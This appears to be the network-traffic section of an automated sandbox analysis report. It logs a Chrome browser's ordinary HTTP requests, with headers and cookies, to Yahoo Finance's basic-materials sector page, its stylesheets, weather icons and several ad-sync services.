*/*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /sectors/basic-materials/ HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /aoldotcom-releases/games/masque/SolitaireClassic_600x400.png HTTP/1.1Host: s.aolcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&rn=1.7387329119779311 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /scripts/prebid_iframe_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1 HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/SHOWERS.svg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/pd?gdpr=0&gdpr_consent=&us_privacy=1YNN&ph=2d1251ae-7f3a-47cf-bd2a-2f288854a0ba HTTP/1.1Host: u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /usermatchredir?s=208386&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&cb=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dix%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /um/ixmatch.html HTTP/1.1Host: js-sec.indexww.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?us_privacy=1YNN&gpp=DBAA&gpp_sid=-1& HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pbcas?us_privacy=1YNN&gdpr=0&gdpr_consent=&type=iframe HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/2.DPu3nbOv.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/PageProgressBar.BUmOb2ZZ.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Debug.SsTdzNxF.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Button.D4GRMVdO.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Icon.DgFg0-NP.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /uc/finance/cosaic/css/finQuote-cc91ea5c.b9a6c12fc99ea24dec24.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uc/finance/cosaic/css/common-182f79bf.be9bec833d1c565712fa.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uc/finance/cosaic/css/common-dfdb1726.d7942345607e91058630.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2&rn=1.7387329119779311 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw
Source: global trafficHTTP traffic detected: GET /aaq/nel/css/spotIm.SpotImJACForQSP.atomic.ltr.5c12e46d3b7a53aff9d869c8059a7f56.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/MOSTLY_SUNNY.svg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
